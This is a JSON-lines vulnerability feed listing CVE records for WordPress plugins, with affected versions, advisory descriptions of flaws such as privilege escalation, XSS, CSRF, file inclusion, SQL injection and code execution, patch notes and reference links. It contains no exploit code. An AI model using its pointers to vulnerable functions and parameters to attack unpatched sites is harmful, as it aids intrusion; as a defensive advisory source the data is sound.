{"CVE_ID":"CVE-2025-7722","slug":"social-streams","versionImpact":"1.0.1","description":"The Social Streams plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 1.0.1. This is due to the plugin not properly validating a user's identity prior to updating their user meta information in the update_user_meta() function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to change their user type to that of an administrator.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/social-streams\\\/trunk\\\/src\\\/php\\\/JsonAPI.php#275\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/social-streams\\\/trunk\\\/src\\\/php\\\/JsonAPI.php#275\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f3f01b88-6f93-4ee8-8d59-9165ebcd4dd1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f3f01b88-6f93-4ee8-8d59-9165ebcd4dd1?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2604","slug":"circle-image-slider-with-lightbox","versionImpact":"1.0.17","description":"The Team Circle Image Slider With Lightbox plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018search_term\u2019 parameter in versions up to, and including, 1.0.17 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=%2Fcircle-image-slider-with-lightbox%2Ftags%2F1.0.17&old=2910236&new_path=%2Fcircle-image-slider-with-lightbox%2Ftags%2F1.0.18&new=2910236&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=%2Fcircle-image-slider-with-lightbox%2Ftags%2F1.0.17&old=2910236&new_path=%2Fcircle-image-slider-with-lightbox%2Ftags%2F1.0.18&new=2910236&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2627ac2b-25a8-480d-ac83-ee0ca323b3a1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2627ac2b-25a8-480d-ac83-ee0ca323b3a1?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4410","slug":"qtranslate-slug","versionImpact":"1.1.18","description":"The Qtranslate Slug plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.1.18. This is due to missing or incorrect nonce validation on the save_postdata() function. This makes it possible for unauthenticated attackers to save post data via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/qtranslate-slug\\\/trunk\\\/includes\\\/class-qtranslate-slug.php#L2099\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/qtranslate-slug\\\/trunk\\\/includes\\\/class-qtranslate-slug.php#L2099\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9d682596-c32d-4abd-ba39-b57fc45c9ce0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9d682596-c32d-4abd-ba39-b57fc45c9ce0?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4994","slug":"allow-php-in-posts-and-pages","versionImpact":"3.0.4","description":"The Allow PHP in Posts and Pages plugin for WordPress is vulnerable to Remote Code Execution in versions up to, and including, 3.0.4 via the 'php' shortcode. This allows authenticated attackers with subscriber-level permissions or above, to execute code on the server.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/allow-php-in-posts-and-pages\\\/trunk\\\/allowphp.php#L373\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/allow-php-in-posts-and-pages\\\/trunk\\\/allowphp.php#L373\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3d8b4bb6-3715-40c1-8140-7fcf874ccec3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3d8b4bb6-3715-40c1-8140-7fcf874ccec3?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5073","slug":"iframe-forms","versionImpact":"1.0","description":"The iframe forms plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'iframe' shortcode in versions up to, and including, 1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/iframe-forms\\\/trunk\\\/iframe-forms.php#L29\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/iframe-forms\\\/trunk\\\/iframe-forms.php#L29\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/818de7f7-913a-4ade-927e-bba281b4709a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/818de7f7-913a-4ade-927e-bba281b4709a?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-3739","slug":"wp-best-quiz","versionImpact":"1.0","description":"The WP Best Quiz WordPress plugin through 1.0 does not sanitize and escape some parameters, which could allow users with a role as low as Author to perform Cross-Site Scripting attacks.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b9f39ced-1e0f-4559-b861-39ddcbcd1249\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b9f39ced-1e0f-4559-b861-39ddcbcd1249\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7167","slug":"persian-fonts","versionImpact":"1.6","description":"The Persian Fonts WordPress plugin through 1.6 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6a2eb871-6b6e-4dbb-99f0-dd74d6c61e83\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6a2eb871-6b6e-4dbb-99f0-dd74d6c61e83\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4273","slug":"essential-real-estate","versionImpact":"4.4.2","description":"The Essential Real Estate plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'ere_property_map' shortcode in all versions up to, and including, 4.4.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c62ec31a-55e9-4404-b860-fa9a51ba3d3f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c62ec31a-55e9-4404-b860-fa9a51ba3d3f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/essential-real-estate\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/essential-real-estate\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3602","slug":"promolayer-popup-builder","versionImpact":"1.1.0","description":"The Pop ups, Exit intent popups, email popups, banners, bars, countdowns and cart savers \u2013 Promolayer plugin for WordPress is vulnerable to unauthorized plugin settings update due to a missing capability check on the disconnect_promolayer function in all versions up to, and including, 1.1.0. This makes it possible for authenticated attackers, with subscriber access or higher, to remove the Promolayer connection.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/05b051bc-3b1c-412e-b3d0-98ff2c8bc06e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/05b051bc-3b1c-412e-b3d0-98ff2c8bc06e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/promolayer-popup-builder\\\/trunk\\\/admin\\\/class-promolayer-admin.php#L208\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/promolayer-popup-builder\\\/trunk\\\/admin\\\/class-promolayer-admin.php#L208\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11723","slug":"kvcore-idx","versionImpact":"2.3.35","description":"The kvCORE IDX plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via any parameter on pages with the kvcoreidx_listings_sitemap_ranges, kvcoreidx_listings_sitemap_page, kvcoreidx_agent_profile_sitemap, or kvcoreidx_agent_profile shortcode present in all versions up to, and including, 2.3.35 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kvcore-idx\\\/includes\\\/kvcore\\\/class-actions.php#L1170\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kvcore-idx\\\/includes\\\/kvcore\\\/class-actions.php#L1170\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/074d8ccc-4fd6-4d46-9bc2-98d209f5a6a1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/074d8ccc-4fd6-4d46-9bc2-98d209f5a6a1?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11642","slug":"ajax-filter-posts","versionImpact":"3.4.12","description":"The Post Grid Master \u2013 Custom Post Types, Taxonomies & Ajax Filter Everything with Infinite Scroll, Load More, Pagination & Shortcode Builder plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 3.4.12 via the 'locate_template' function. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included. The file included must have a .php extension.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ajax-filter-posts\\\/tags\\\/3.4.12\\\/inc\\\/Shortcode.php#L624\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ajax-filter-posts\\\/tags\\\/3.4.12\\\/inc\\\/Shortcode.php#L624\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b299a932-8167-4547-845b-637c4971360d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b299a932-8167-4547-845b-637c4971360d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13399","slug":"gosign-posts-slider-block","versionImpact":"1.1.0","description":"The Gosign \u2013 Posts Slider Block plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'posts-slider-block' block in all versions up to, and including, 1.1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/gosign-posts-slider-block\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/gosign-posts-slider-block\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0778c676-92e6-4813-a564-06463fc84eec?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0778c676-92e6-4813-a564-06463fc84eec?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1005","slug":"elementskit-lite","versionImpact":"3.4.0","description":"The ElementsKit Elementor addons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Image Accordion widget in all versions up to, and including, 3.4.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elementskit-lite\\\/trunk\\\/modules\\\/layout-manager\\\/assets\\\/js\\\/ekit-layout-library.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elementskit-lite\\\/trunk\\\/modules\\\/layout-manager\\\/assets\\\/js\\\/ekit-layout-library.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=%2Felementskit-lite&old=3230214&new_path=%2Felementskit-lite&new=3237243&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=%2Felementskit-lite&old=3230214&new_path=%2Felementskit-lite&new=3237243&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/elementskit-lite\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/elementskit-lite\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5b74d6aa-ad59-42be-b454-9c27428cab01?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5b74d6aa-ad59-42be-b454-9c27428cab01?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1319","slug":"site-mailer","versionImpact":"1.2.3","description":"The Site Mailer \u2013 SMTP Replacement, Email API Deliverability & Email Log plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 1.2.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3247059\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3247059\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/site-mailer\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/site-mailer\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c9fe3574-f338-474c-af78-f843501d422c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c9fe3574-f338-474c-af78-f843501d422c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-31640","slug":"magic-carousel","versionImpact":"1.4","description":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in LambertGroup Magic Responsive Slider and Carousel WordPress allows SQL Injection. This issue affects Magic Responsive Slider and Carousel WordPress: from n\/a through 1.4.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/magic-carousel\\\/vulnerability\\\/wordpress-magic-responsive-slider-and-carousel-wordpress-1-4-sql-injection-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/magic-carousel\\\/vulnerability\\\/wordpress-magic-responsive-slider-and-carousel-wordpress-1-4-sql-injection-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5490","slug":"football-pool","versionImpact":"2.12.4","description":"The Football Pool plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 2.12.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/football-pool\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/football-pool\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/16a285b1-7a20-455f-8f74-2e468dd436d3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/16a285b1-7a20-455f-8f74-2e468dd436d3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6261","slug":"fleetwire-fleet-management","versionImpact":"1.0.19","description":"The Fleetwire Fleet Management plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's fleetwire_list shortcode in all versions up to, and including, 1.0.19 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/fleetwire-fleet-management\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/fleetwire-fleet-management\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7593b8b5-36c0-4c68-b1f2-d505fafc3328?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7593b8b5-36c0-4c68-b1f2-d505fafc3328?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0073","slug":"wp-client-logo-carousel","versionImpact":"3.0.0","description":"The Client Logo Carousel WordPress plugin through 3.0.0 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e5599968-a435-405a-8829-9840a2144987\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e5599968-a435-405a-8829-9840a2144987\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-46861","slug":"login-page-styler","versionImpact":"6.2","description":"Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in Zia Imtiaz Custom Login Page Styler for WordPress plugin <=\u00a06.2 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/login-page-styler\\\/wordpress-login-page-styler-plugin-6-2-cross-site-scripting-xss?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/login-page-styler\\\/wordpress-login-page-styler-plugin-6-2-cross-site-scripting-xss?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2599","slug":"ldap-login-for-intranet-sites","versionImpact":"4.1.4","description":"The Active Directory Integration plugin for WordPress is vulnerable to Cross-Site Request Forgery leading to time-based SQL Injection via the orderby and order parameters in versions up to, and including, 4.1.4 due to missing nonce verification on the get_users function and insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to cause resource exhaustion via a forged request granted they can trick an administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/74089b16-76fa-4654-9007-3f0c2e894894?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/74089b16-76fa-4654-9007-3f0c2e894894?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ldap-login-for-intranet-sites\\\/trunk\\\/class-mo-ldap-user-auth-reports.php?rev=2859403#L64\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ldap-login-for-intranet-sites\\\/trunk\\\/class-mo-ldap-user-auth-reports.php?rev=2859403#L64\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2910898%40ldap-login-for-intranet-sites%2Ftrunk&old=2903294%40ldap-login-for-intranet-sites%2Ftrunk&sfp_email=&sfph_mail=#file5\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2910898%40ldap-login-for-intranet-sites%2Ftrunk&old=2903294%40ldap-login-for-intranet-sites%2Ftrunk&sfp_email=&sfph_mail=#file5\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4409","slug":"exportfeed-for-woocommerce-product-to-etsy","versionImpact":"3.3.1","description":"The WooCommerce Etsy Integration plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 3.3.1. This is due to missing or incorrect nonce validation on the etcpf_delete_feed() function. This makes it possible for unauthenticated attackers to delete an export feed via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2573194\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2573194\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/99489cc0-2e73-4d55-b95f-46d574897fac?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/99489cc0-2e73-4d55-b95f-46d574897fac?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4963","slug":"ws-facebook-likebox","versionImpact":"5.0","description":"The WS Facebook Like Box Widget for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'ws-facebook-likebox' shortcode in versions up to, and including, 5.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8bebc229-9d15-439f-a8df-f68455bc5193?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8bebc229-9d15-439f-a8df-f68455bc5193?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ws-facebook-likebox\\\/trunk\\\/includes\\\/shortcodes.php#L22\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ws-facebook-likebox\\\/trunk\\\/includes\\\/shortcodes.php#L22\",\"refsource\":\"MISC\",\"tags\":[]}]"}
